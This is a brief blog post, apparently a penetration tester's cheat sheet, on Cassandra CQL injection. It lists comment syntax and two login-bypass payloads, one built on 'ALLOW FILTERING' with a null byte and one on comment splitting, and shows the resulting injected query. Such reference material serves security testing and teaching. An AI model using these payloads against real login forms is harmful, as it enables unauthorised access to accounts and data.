Cassandra Injection
Post
Cancel

Cassandra Injection

Zxce3 Oct 9, 2020 2020-10-09T00:00:00+07:00
1 min reads

Cassandra Injection

Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

Summary

Cassandra comment

1

/* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

1
2

username: admin' ALLOW FILTERING; %00
password: ANY

Login Bypass 1

1
2

username: admin'/*
password: */and pass>'

The injection would look like the following SQL query

1

SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

References

Database, Cassandra
Injection Database SQL Apache NoSQL
This post is licensed under CC BY 4.0 by the author.
Contents

Linux persistence

Directory Traversal